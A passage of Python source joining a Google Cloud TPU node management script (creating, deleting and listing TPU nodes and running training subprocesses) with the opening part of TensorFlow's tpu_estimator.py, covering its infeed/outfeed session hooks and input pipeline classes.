leader. os.killpg(os.getpgid(self.current_process.pid), signal.SIGTERM) self.task_running = False self.running_time += time.time() - self.started_time # run_task should be called at the beginning and # then only after the call to kill current_process def run_task(self): """Call a subprocess to run the training task on the current TPU node. """ tpu_name = self.tpu_name() logging.info('{} - running task: {}'.format(self.prefix, tpu_name)) with open(self.prefix + ".json", "w") as f: json.dump(self.params["model_params"], f) cmd = RUN_TASK_COMMAND.format(tpu_name=tpu_name, model=self.prefix + ".json") command = shlex.split(cmd) # use popen so we can kill it when needed p = Popen(command, stdout=PIPE, preexec_fn=os.setsid) self.task_running = True self.started_time = time.time() self.current_process = p def delete(self): """Delete the TPU node. """ tpu_name = self.tpu_name() logging.info('{} - deleting: {}'.format(self.prefix, tpu_name)) args = (self.project, self.location, tpu_name) p = Process(target=delete_tpu, args=args) p.start() return p def create(self): """Create a TPU node. 
""" tpu_name = self.tpu_name() tpu_cidr_block = self.tpu_cidr_block() logging.info('{} - creating: {}, {}'.format(self.prefix, tpu_name, tpu_cidr_block)) args = ( self.project, self.location, tpu_name, self.params["accelerator_type"], TENSORFLOW_VERSION, tpu_cidr_block, self.params["preemptible"] ) p = Process(target=create_tpu, args=args) p.start() self.created = True return p def dump_dict(self): d = { "project": self.project, "location": self.location, "id": self.id, "params": self.params, "running_time": self.running_time, "current_save": self.current_save, "done": self.done } return d # Util functions def list_tpus(project, location): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". Returns A Python dictionary with keys 'nodes' and 'nextPageToken'. """ logging.getLogger("googleapiclient.discovery").setLevel(logging.WARNING) # Silence URL spam service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) parent = 'projects/{}/locations/{}'.format(project, location) request = service.projects().locations().nodes().list(parent=parent) return request.execute() def create_tpu(project, location, tpu_name, accelerator_type='v2-8', tensorflow_version='1.11', cidr_block='10.0.101.0', preemptible=False): """Create a TPU node. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. accelerator_type: (str) The type of the TPU node, such as "v2-8". tensorflow_version: (str) The TensorFlow version, such as "1.11". cidr_block: (str) The CIDR block used by the TPU node, such as "10.0.101.0". preemptible: (bool) Whether the node should be created as preemptible. Returns A TPU node creation operation object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) parent = 'projects/{}/locations/{}'.format(project, location) node = { 'acceleratorType': accelerator_type, 'tensorflowVersion': tensorflow_version, 'network': 'default', 'cidrBlock': cidr_block, 'schedulingConfig': { 'preemptible': preemptible } } # NOTE: in docs and samples nodeId is often referred to as tpu_name request = service.projects().locations().nodes().create( parent=parent, body=node, nodeId=tpu_name) return request.execute() def get_tpu(project, location, tpu_name): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. Returns A TPU node object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) name = 'projects/{}/locations/{}/nodes/{}'.format( project, location, tpu_name) request = service.projects().locations().nodes().get(name=name) return request.execute() def delete_tpu(project, location, tpu_name): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. Returns A TPU node deletion operation object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) name = 'projects/{}/locations/{}/nodes/{}'.format( project, location, tpu_name) request = service.projects().locations().nodes().delete( name=name) return request.execute()
tpu_estimator.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================== """TPUEstimator class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import os import signal import threading import time import traceback import numpy as np import six from six.moves import queue as Queue # pylint: disable=redefined-builtin from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.contrib.tpu.python.ops import tpu_ops from tensorflow.contrib.tpu.python.tpu import session_support from tensorflow.contrib.tpu.python.tpu import tpu from tensorflow.contrib.tpu.python.tpu import tpu_config from tensorflow.contrib.tpu.python.tpu import tpu_context from tensorflow.contrib.tpu.python.tpu import tpu_feed from tensorflow.contrib.tpu.python.tpu import training_loop from tensorflow.contrib.tpu.python.tpu import util as util_lib from tensorflow.contrib.training.python.training import hparam from tensorflow.core.framework import variable_pb2 from tensorflow.core.framework.summary_pb2 import Summary from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.ops import dataset_ops from tensorflow.python.estimator import estimator as estimator_lib from tensorflow.python.estimator import model_fn as model_fn_lib from tensorflow.python.estimator import util as estimator_util from tensorflow.python.estimator.export import export_output as export_output_lib from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import summary_ops_v2 as contrib_summary from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import tf_logging as logging from tensorflow.python.saved_model import tag_constants from tensorflow.python.summary import summary from tensorflow.python.training import basic_session_run_hooks from tensorflow.python.training import evaluation from tensorflow.python.training import session_run_hook from tensorflow.python.training import training from tensorflow.python.training import training_util from tensorflow.python.util import function_utils from tensorflow.python.util import nest from tensorflow.python.util import tf_inspect _INITIAL_LOSS = 1e7 _ZERO_LOSS = 0. 
_TPU_ESTIMATOR = 'tpu_estimator' _ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop' _BATCH_SIZE_KEY = 'batch_size' _CTX_KEY = 'context' _USE_TPU_KEY = 'use_tpu' _CROSS_REPLICA_SUM_OP = 'CrossReplicaSum' _ONE_GIGABYTE = 1024 * 1024 * 1024 _TPU_ENQUEUE_OPS = '_tpu_enqueue_ops' _TPU_TRAIN_OP = '_tpu_train_op' _REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference' # Ideally _USE_TPU_KEY should be reserved as well. However there are already # models that make use of this key, thus it can not be reserved now to prevent # breakage. In the long run, we would like to mitigate this by migrating models # off of using _USE_TPU_KEY. _RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY] # TODO(b/65703635): Flip the value and remove all dead code. Currently, this is # only used for per-core based deployments. For per-host based pipelines, if a # user returns a Dataset instance it will be automatically wrapped in a # tf.while_loop (This can be disabled by returning features and labels # explicitly). _WRAP_INPUT_FN_INTO_WHILE_LOOP = False ops.register_proto_function( '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR), proto_type=variable_pb2.VariableDef, to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access def _create_global_step(graph): graph = graph or ops.get_default_graph() if training.get_global_step(graph) is not None: raise ValueError('"global_step" already exists.') # Create in proper graph and base name_scope. with graph.as_default() as g, g.name_scope(None): return variable_scope.get_variable( ops.GraphKeys.GLOBAL_STEP, shape=[], dtype=dtypes.int64, initializer=init_ops.zeros_initializer(), trainable=False, use_resource=True, collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP]) def _create_or_get_iterations_per_loop(): """Creates or gets the iterations_per_loop variable. In TPUEstimator, the user provided computation, the model_fn, is wrapped inside a tf.while_loop for peak performance. The iterations of the loop are specified by this variable, which adjusts its value on the CPU after each TPU program execution and before the next TPU execution. The purpose of using a variable, rather than a constant, is to allow TPUEstimator to adapt the TPU training iterations according to the final steps specified by users. For example, if the user sets the iterations_per_loop as 4 in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop variable will have the following value before each TPU training. - 1st TPU execution: iterations_per_loop = 4 - 2nd TPU execution: iterations_per_loop = 4 - 3rd TPU execution: iterations_per_loop = 2 As model_fn increases the global step once per train_op invocation, the global step is 10 after all TPU executions, matching the steps=10 inputs passed in by users. Returns: A TF non-trainable resource variable. Raises: RuntimeError: If multiple iterations_per_loop variables were found.
""" graph = ops.get_default_graph() collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR) iter_vars = graph.get_collection(collection_name) if len(iter_vars) == 1: return iter_vars[0] elif len(iter_vars) > 1: raise RuntimeError('Multiple iterations_per_loop_var in collection.') with ops.colocate_with(training_util.get_global_step()): with variable_scope.variable_scope( _TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE): return variable_scope.get_variable( _ITERATIONS_PER_LOOP_VAR, initializer=init_ops.zeros_initializer(), shape=[], dtype=dtypes.int32, trainable=False, collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES], use_resource=True) def _sync_variables_ops(): # Gets the variables back from TPU nodes. This means the variables updated # by TPU will now be *synced* to host memory. return [ array_ops.check_numerics(v.read_value(), 'Gradient for %s is NaN' % v.name).op for v in variables.trainable_variables() ] def _increase_eval_step_op(iterations_per_loop): """Returns an op to increase the eval step for TPU evaluation. Args: iterations_per_loop: Tensor. The number of eval steps running in TPU system before returning to CPU host for each `Session.run`. Returns: An operation """ eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access # Estimator evaluate increases 1 by default. So, we increase the difference. return state_ops.assign_add( eval_step, math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype), use_locking=True) class _SIGNAL(object): """Signal used to control the thread of infeed/outfeed. All preserved signals must be negative numbers. Positive numbers are used to indicate the number of iterations for next training/evaluation loop. """ NEXT_BATCH = -1 STOP = -2 class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access """Ops and objects returned from a `model_fn` and passed to `TPUEstimator`. See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and `export_outputs`. For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where `metric_fn` runs on CPU to generate metrics and `tensors` represents the `Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`. To be precise, TPU evaluation expects a slightly different signature from the @{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`. The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The `tensors` usually specify the model logits, which are transferred back from TPU system to CPU host. All tensors must have be batch-major, i.e., the batch size is the first dimension. Once all tensors are available at CPU host from all shards, they are concatenated (on CPU) and passed as positional arguments to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is a dict. `metric_fn` takes the `tensors` and returns a dict from metric string name to the result of calling a metric function, namely a `(metric_tensor, update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the `eval_metrics`. `scaffold_fn` is a function running on CPU to generate the `Scaffold`. This function should not capture any Tensors in `model_fn`. `host_call` is a tuple of a `function` and a list or dictionary of `tensors` to pass to that function and returns a list of Tensors. `host_call` currently works for train() and evaluate(). 
The Tensors returned by the function is executed on the CPU on every step, so there is communication overhead when sending tensors from TPU to CPU. To reduce the overhead, try reducing the size of the tensors. The `tensors` are concatenated along their major (batch) dimension, and so must be >= rank 1. The `host_call` is useful for writing summaries with @{tf.contrib.summary.create_file_writer}. """ def __new__(cls, mode, predictions=None, loss=None, train_op=None, eval_metrics=None, export_outputs=None, scaffold_fn=None, host_call=None): """Creates a validated `TPUEstimatorSpec` instance.""" host_calls = {} if eval_metrics is not None: host_calls['eval_metrics'] = eval_metrics if host_call is not None: host_calls['host_call'] = host_call _OutfeedHostCall.validate(host_calls) return super(TPUEstimatorSpec, cls).__new__( cls, mode=mode, predictions=predictions, loss=loss, train_op=train_op, eval_metrics=eval_metrics, export_outputs=export_outputs, scaffold_fn=scaffold_fn, host_call=host_call) def as_estimator_spec(self): """Creates an equivalent `EstimatorSpec` used by CPU train/eval.""" host_calls = {} if self.eval_metrics is not None: host_calls['eval_metrics'] = self.eval_metrics if self.host_call is not None: host_calls['host_call'] = self.host_call host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls) eval_metric_ops = None if self.eval_metrics is not None: eval_metric_ops = host_call_ret['eval_metrics'] hooks = None if self.host_call is not None: hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])] scaffold = self.scaffold_fn() if self.scaffold_fn else None return model_fn_lib.EstimatorSpec( mode=self.mode, predictions=self.predictions, loss=self.loss, train_op=self.train_op, eval_metric_ops=eval_metric_ops, export_outputs=self.export_outputs, scaffold=scaffold, training_hooks=hooks, evaluation_hooks=hooks, prediction_hooks=hooks) class _OpQueueContext(object): """Manages work queue and thread for a infeed/outfeed thread.""" def __init__(self, name, target, args): self._name = name self._queue = Queue.Queue() args = (self,) + args self._thread = threading.Thread(name=name, target=target, args=args) self._thread.daemon = True self._thread.start() def stop(self): self._queue.put(_SIGNAL.STOP) def send_next_batch_signal(self, iterations): self._queue.put(iterations) def read_iteration_counts(self): while True: iterations = self._queue.get(block=True) logging.debug('%s read iterations %s', self._name, iterations) if iterations == _SIGNAL.STOP: logging.info('%s received shutdown signal, stopping.', self._name) return yield iterations def join(self): logging.info('Shutting down %s thread.' % self._name) self.stop() self._thread.join() class _OpSignalOnceQueueContext(_OpQueueContext): """Manages work queue and thread for a infeed/outfeed thread. This subclass only signals once. """ def __init__(self, name, target, args): super(_OpSignalOnceQueueContext, self).__init__(name, target, args) self._has_signaled = False def send_next_batch_signal(self, iterations): if not self._has_signaled: self._queue.put(iterations) self._has_signaled = True class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook): """A Session hook setting up the TPU initialization, infeed, and outfeed. This hook does two major things: 1. initialize and shutdown TPU system. 2. launch and join the threads for infeed enqueue and (optional) outfeed dequeue. 
""" def __init__(self, ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=True): self._master_job = ctx.master_job self._enqueue_ops = enqueue_ops self._dequeue_ops = dequeue_ops self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator self._initial_infeed_sleep_secs = ( ctx.config.tpu_config.initial_infeed_sleep_secs) self._session_cancel_timer = None self._feed_error = None self._finished = False def begin(self): logging.info('TPU job name %s', self._master_job) self._iterations_per_loop_var = _create_or_get_iterations_per_loop() self._init_ops = [tpu.initialize_system(job=self._master_job)] self._finalize_ops = [tpu.shutdown_system(job=self._master_job)] summary_writer_init_ops = contrib_summary.summary_writer_initializer_op() self._init_ops.extend(summary_writer_init_ops) # Get all the writer resources from the initializer, so we know what to # flush. for op in summary_writer_init_ops: self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0])) def _log_error(self, session, error): """Log an infeed or outfeed error. This logs a short error message immediately, and schedules a timer to emit the full stack trace and error message after a short period of time. If the main session has terminated by the time the timer triggers, we assume the real source of the error was from the main session and avoid emitting a stack trace for the infeed. Args: session: `tf.Session`, session to be terminated error: exception that triggered logging. error: the Exception to log. """ logging.warning( '\n\n' 'Error occurred during infeed/outfeed. This may be due to a compile ' 'error in the main session. Waiting for a short time for the main ' 'session to come back.\n\n%s', error) self._feed_error = traceback.format_exc() # If we've already encountered a feed error, don't schedule another # cancellation op. if self._session_cancel_timer: return def _cancel_session(): """Close the session to avoid the main thread from hanging. If input pipeline triggers any error, the infeed thread dies but the main thread for TPU computation waits for the infeed enqueue forever. Close the Session to cancel the main thread Session.run execution. We sleep for a few seconds before closing to give some time for the TPU compilation error, if any, propagating, from TPU to CPU host. Compilation errors should be reported by the main thread so that the program can be interrupted and users can take action. Due to a race condition, the infeed thread might see an error first. Closing the session here immediately would result in a session cancellation exception in the main thread, instead of the expected compile error. User code that depends on having the proper exception type will therefore be confused. """ time.sleep(5) # If the main session is still running, the infeed/outfeed errors are # legitimate, and should be logged. if not self._finished and self._feed_error: logging.error('Feed error: %s', self._feed_error) logging.error('Closing session. 
A RuntimeError should follow.') session.close() self._session_cancel_timer = threading.Thread(target=_cancel_session) self._session_cancel_timer.daemon = True self._session_cancel_timer.start() def _run_infeed(self, queue_ctx, session): logging.info('Starting infeed thread controller.') if self._initial_infeed_sleep_secs: logging.info('%s thread sleeping for %d seconds.', self._name, self._initial_infeed_sleep_secs) time.sleep(self._initial_infeed_sleep_secs) logging.info('%s thread starting after sleep', self._name) try: if self._run_infeed_loop_on_coordinator: for count, steps in enumerate(queue_ctx.read_iteration_counts()): for i in xrange(steps): logging.debug('Infeed enqueue for iteration (%d, %d)', count, i) session.run(self._enqueue_ops) else: for _ in queue_ctx.read_iteration_counts(): session.run(self._enqueue_ops) logging.info('Infeed thread finished, shutting down.') except Exception as e: # pylint: disable=broad-except self._log_error(session, e) def _run_outfeed(self, queue_ctx, session): logging.info('Starting outfeed thread controller.') try: for count, steps in enumerate(queue_ctx.read_iteration_counts()): for i in xrange(steps): logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i) session.run(self._dequeue_ops) logging.info('Outfeed thread finished, shutting down.') except Exception as e: # pylint: disable=broad-except self._log_error(session, e) def _create_infeed_controller(self, name, target, args): return _OpQueueContext(name=name, target=target, args=args) def after_create_session(self, session, coord): logging.info('Init TPU system') session.run(self._init_ops, options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000)) self._infeed_controller = self._create_infeed_controller( name='InfeedController', target=self._run_infeed, args=(session,)) self._outfeed_controller = _OpQueueContext( name='OutfeedController', target=self._run_outfeed, args=(session,)) def before_run(self, run_context): self._feed_error = None # Wait for the cancellation timer to complete before continuing. if self._session_cancel_timer: self._session_cancel_timer.join() self._session_cancel_timer = None iterations = run_context.session.run(self._iterations_per_loop_var) logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations) self._infeed_controller.send_next_batch_signal(iterations) logging.info('Dequeue next (%d) batch(es) of data from outfeed.', iterations) self._outfeed_controller.send_next_batch_signal(iterations) def end(self, session): if self._session_cancel_timer: logging.warning('Feed error occurred; waiting for message.') self._session_cancel_timer.join() self._finished = True logging.info('Stop infeed thread controller') self._infeed_controller.join() logging.info('Stop output thread controller') self._outfeed_controller.join() logging.info('Shutdown TPU system.') session.run(self._finalize_ops) class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook): def __init__(self, ctx, enqueue_ops, dequeue_ops): super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__( ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False) def _create_infeed_controller(self, name, target, args): return _OpSignalOnceQueueContext(name=name, target=target, args=args) class _TPUStopAtStepHook(session_run_hook.SessionRunHook): """Hook that requests stop at a specified step. This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with following differences for TPU training: 1. 
This hook sets the variable for iterations_per_loop, which is used by `TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed. As the hook execution order is not guaranteed, the variable update is handled in `after_create_session` and `after_run` as `TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`. 2. For each training loop (session.run), the global step could be increased multiple times on TPU. The global step tensor value will be explicitly read again in `after_run` to ensure the latest value is retrieved to avoid race condition. """ def __init__(self, iterations, num_steps=None, last_step=None): """Initializes a `StopAtStepHook`. Args: iterations: The number of iterations to run optimizer per training loop. num_steps: Number of steps to execute. last_step: Step after which to stop. Raises: ValueError: If one of the arguments is invalid. """ if num_steps is None and last_step is None: raise ValueError('One of num_steps or last_step must be specified.') if num_steps is not None and last_step is not None: raise ValueError('Only one of num_steps or last_step can be specified.') self._num_steps = num_steps self._last_step = last_step self._iterations = iterations def _next_iterations(self, global_step, last_step): gap = last_step - global_step return min(gap, self._iterations) def begin(self): self._global_step_tensor = training_util.get_global_step() if self._global_step_tensor is None: raise RuntimeError('Global step should be created.') self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): global_step = session.run(self._global_step_tensor) if self._last_step is None: self._last_step = global_step + self._num_steps iterations = self._next_iterations(global_step, self._last_step) self._iterations_per_loop_var.load(iterations, session=session) def after_run(self, run_context, run_values): # Global step cannot be retrieved via SessionRunArgs and before_run due to # race condition. global_step = run_context.session.run(self._global_step_tensor) if global_step >= self._last_step: run_context.request_stop() else: iterations = self._next_iterations(global_step, self._last_step) self._iterations_per_loop_var.load( iterations, session=run_context.session) class _SetEvalIterationsHook(session_run_hook.SessionRunHook): """Hook that requests stop at a specified step.""" def __init__(self, num_steps): """Initializes a `_SetEvalIterationsHook`. Args: num_steps: Number of steps to execute. """ self._num_steps = num_steps def begin(self): self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): self._iterations_per_loop_var.load(self._num_steps, session=session) class _StoppingPredictHook(session_run_hook.SessionRunHook): """Hook that requests stop according to the stopping signal in prediction.""" def __init__(self, scalar_stopping_signal): self._scalar_stopping_signal = scalar_stopping_signal def begin(self): self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): # This is not necessary as we do not run infeed enqueue and outfeed dequeue # in side threads for prediction model. But it makes the # TPUInfeedOutfeedSessionHook prints nice message. 
self._iterations_per_loop_var.load(1, session=session) def before_run(self, run_context): return session_run_hook.SessionRunArgs(self._scalar_stopping_signal) def after_run(self, run_context, run_values): _ = run_context scalar_stopping_signal = run_values.results if _StopSignals.should_stop(scalar_stopping_signal): # NOTE(xiejw): In prediction, stopping signals are inserted for each # batch. And we append one more batch to signal the system it should stop. # The data flow might look like # # batch 0: images, labels, stop = 0 (user provided) # batch 1: images, labels, stop = 0 (user provided) # ... # batch 99: images, labels, stop = 0 (user provided) # batch 100: images, labels, stop = 1 (TPUEstimator appended) # # where the final batch (id = 100) is appended by TPUEstimator, so we # should drop it before returning the predictions to user. # To achieve that, we throw the OutOfRangeError in after_run. Once # Monitored Session sees this error in SessionRunHook.after_run, the # "current" prediction, i.e., batch with id=100, will be discarded # immediately raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.') def generate_per_core_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, host_device, host_id): """Generates infeed enqueue ops for per-core input_fn on a single host.""" captured_infeed_queue = _CapturedObject() tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """A fn returns enqueue_ops.""" num_cores_per_host = ctx.num_of_cores_per_host per_host_sharded_inputs = [] for core_ordinal in range(num_cores_per_host): with ops.name_scope('ordinal_%d' % (core_ordinal)): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=host_device, invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal ) inputs = _Inputs.from_input_fn(input_fn(user_context)) if inputs.is_dataset: raise TypeError( '`input_fn` returning `Dataset` is not yet supported in ' 'per-Core input pipeline deployment yet. 
Please set ' 'TPUConfig.per_host_input_for_training to True or return ' '`features` and `labels` from `input_fn`') features, labels = inputs.features_and_labels() inputs_structure_recorder.validate_and_record_structure( features, labels) flattened_inputs = ( inputs_structure_recorder.flatten_features_and_labels( features, labels)) per_host_sharded_inputs.append(flattened_inputs) infeed_queue = tpu_feed.InfeedQueue( number_of_tuple_elements=len(per_host_sharded_inputs[0])) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_configuration_from_sharded_input_tensors( per_host_sharded_inputs) per_host_enqueue_ops = infeed_queue.generate_enqueue_ops( per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl) return per_host_enqueue_ops return enqueue_ops_fn, captured_infeed_queue def generate_per_host_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id): """Generates infeed enqueue ops for per-host input_fn on a single host.""" captured_infeed_queue = _CapturedObject() hooks = [] with ops.device(device): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=device, invocation_index=host_id) inputs = _Inputs.from_input_fn(input_fn(user_context)) is_dataset = inputs.is_dataset if ctx.mode == model_fn_lib.ModeKeys.PREDICT: if not is_dataset: raise TypeError( 'For mode PREDICT, `input_fn` must return `Dataset` instead of ' '`features` and `labels`.') if batch_axis is not None: raise TypeError('For mode PREDICT, batch_axis is not supported yet.') inputs = _InputsWithStoppingSignals( dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn, add_padding=True) if is_dataset: hooks.append(inputs.dataset_initializer_hook()) tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """A Fn returning the TPU infeed enqueue ops. By providing as a Fn, it can be invoked inside the tf.while_loop such that the input pipeline for multiple iterations can be executed by one Session.run call. Returns: list of dict of ops. """ with ops.device(device): num_of_replicas_per_host = ctx.num_of_replicas_per_host # Convert user input to features and labels. 
If the user returns a # dataset, it is initialized and the features and labels extracted via # `dataset.iterator.get_next()` features, labels = inputs.features_and_labels() signals = inputs.signals() inputs_structure_recorder.validate_and_record_structure( features, labels, signals) unsharded_tensor_list = ( inputs_structure_recorder.flatten_features_and_labels( features, labels, signals)) infeed_queue = tpu_feed.InfeedQueue( tuple_types=[t.dtype for t in unsharded_tensor_list], tuple_shapes=[t.shape for t in unsharded_tensor_list], shard_dimensions=batch_axis) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_number_of_shards(num_of_replicas_per_host) per_host_enqueue_ops = ( infeed_queue.split_inputs_and_generate_enqueue_ops( unsharded_tensor_list, placement_function=lambda x: device, tpu_ordinal_function=tpu_ordinal_function_impl)) if signals is None: return per_host_enqueue_ops else: return { 'ops': per_host_enqueue_ops, 'signals': signals, } return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset def generate_per_host_v2_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, device, host_id): """Generates infeed enqueue ops for per-host input_fn on a single host.""" captured_infeed_queue = _CapturedObject() hooks = [] with ops.device(device): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=device, invocation_index=host_id) inputs = _Inputs.from_input_fn(input_fn(user_context)) is_dataset = inputs.is_dataset if not is_dataset: raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 ' 'input pipeline configuration.') if ctx.mode == model_fn_lib.ModeKeys.PREDICT: # TODO(b/XXX): Add predict support for PER_HOST_V2 raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.') hooks.append(inputs.dataset_initializer_hook()) tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """Generates the per_host enqueue ops.""" control_deps = [] per_host_sharded_inputs = [] num_replicas_per_host = ctx.num_of_replicas_per_host with ops.device(device): if not inputs.is_dataset: raise TypeError('`input_fn` must return a `Dataset` for this mode.') for _ in range(num_replicas_per_host): # Use control dependencies to ensure a deterministic ordering. with ops.control_dependencies(control_deps): features, labels = inputs.features_and_labels() # Calls get_next() inputs_structure_recorder.validate_and_record_structure( features, labels) flattened_inputs = ( inputs_structure_recorder.flatten_features_and_labels( features, labels)) control_deps.extend(flattened_inputs) per_host_sharded_inputs.append(flattened_inputs) infeed_queue = tpu_feed.InfeedQueue( number_of_tuple_elements=len(per_host_sharded_inputs[0])) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_configuration_from_sharded_input_tensors( per_host_sharded_inputs) per_host_enqueue_ops = infeed_queue.generate_enqueue_ops( per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl) return per_host_enqueue_ops return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset class _InputPipeline(object): """`_InputPipeline` handles invoking `input_fn` and piping to infeed queue. `_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from call site. 
To be precise, based on the configuration in `_InternalTPUContext`, it invokes `input_fn` for all cores (usually multi-host TPU training) or for one host (usually for single-host TPU evaluation), and sends all `features` and `labels` returned by `input_fn` to TPU infeed. For per-core invocation, `features` and `labels` are piped to infeed directly, one tuple for each core. For per-host invocation, `features` and `labels` are split at host (with respect to `batch_axis`) and piped to all cores accordingly. In addition, flatten/unflatten are handled by `_InputPipeline` also. Model inputs returned by the `input_fn` can have one of the following forms: 1. features 2. (features, labels) Internally, form 1 is reformed to `(features, None)` as features and labels are passed separately to underlying methods. For TPU training, TPUEstimator may expect multiple `features` and `labels` tuples one for each core. TPUEstimator allows various different structures for inputs (namely `features` and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`, and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`. TPU infeed/outfeed library expects flattened tensor list. So, `features` and `labels` need to be flattened, before infeed enqueue, and the structure of them needs to be recorded, in order to restore them after infeed dequeue. """ class InputsStructureRecorder(object): """The recorder to record inputs structure.""" def __init__(self): # Holds the structure of inputs self._feature_names = [] self._label_names = [] self._has_labels = False self._signals_helper = None # Internal state. self._initialized = False def has_labels(self): return self._has_labels def validate_and_record_structure(self, features, labels, signals=None): """Validates and records the structure of features` and `labels`.""" def _extract_key_names(tensor_or_dict): if tensor_or_dict is None: return [] return sorted(tensor_or_dict.keys()) if isinstance( tensor_or_dict, dict) else [] # Extract structure. has_labels = labels is not None feature_names = _extract_key_names(features) label_names = _extract_key_names(labels) if signals is not None and self._signals_helper is None: # Record signals helper. self._signals_helper = _SignalsHelper(signals) if self._initialized: # Verify the structure is same. The following should never happen. assert feature_names == self._feature_names, 'feature keys mismatched' assert label_names == self._label_names, 'label keys mismatched' assert has_labels == self._has_labels, 'label presence mismatched' else: # Record structure. self._initialized = True self._feature_names = feature_names self._label_names = label_names self._has_labels = has_labels def flatten_features_and_labels(self, features, labels, signals=None): """Flattens the `features` and `labels` to a single tensor list.""" flattened_inputs = [] if self._feature_names: # We need a fixed ordering for enqueueing and dequeueing. flattened_inputs.extend( [features[name] for name in self._feature_names]) else: 